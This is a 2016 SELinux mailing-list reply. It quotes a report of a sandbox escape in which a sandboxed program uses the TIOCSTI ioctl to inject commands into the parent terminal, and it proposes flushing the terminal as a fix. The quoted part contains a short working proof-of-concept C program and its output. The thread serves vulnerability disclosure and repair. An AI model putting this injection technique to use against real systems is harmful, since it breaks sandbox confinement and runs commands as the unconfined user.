On Fri, Sep 23, 2016 at 5:23 AM, <up201407890@xxxxxxxxxxxxxxxxxxx> wrote:
> Hi,
>
> When executing a program via the SELinux sandbox, the nonpriv session can
> escape to the parent session by using the TIOCSTI ioctl to push characters
> into the terminal's input buffer, allowing an attacker to escape the
> sandbox.
>
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
>
> int main()
> {
> char *cmd = "id\n";
> while(*cmd)
> ioctl(0, TIOCSTI, cmd++);
> execlp("/bin/id", "id", NULL);
> }
>
> $ gcc test.c -o test
> $ /bin/sandbox ./test
> id
> uid=1000 gid=1000 groups=1000
> context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
> $ id <------ did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
I've only just started looking at this, but it seems like we need a
call to tcflush()/ioctl(TCFLSH) in the sandbox tool immediately after
the sandboxed process exits. Do any of the userspace tools guys have
any other ideas?
--
paul moore
www.paul-moore.com
_______________________________________________
Selinux mailing list
Selinux@xxxxxxxxxxxxx
To unsubscribe, send email to Selinux-leave@xxxxxxxxxxxxx.
To get help, send an email containing "help" to Selinux-request@xxxxxxxxxxxxx.
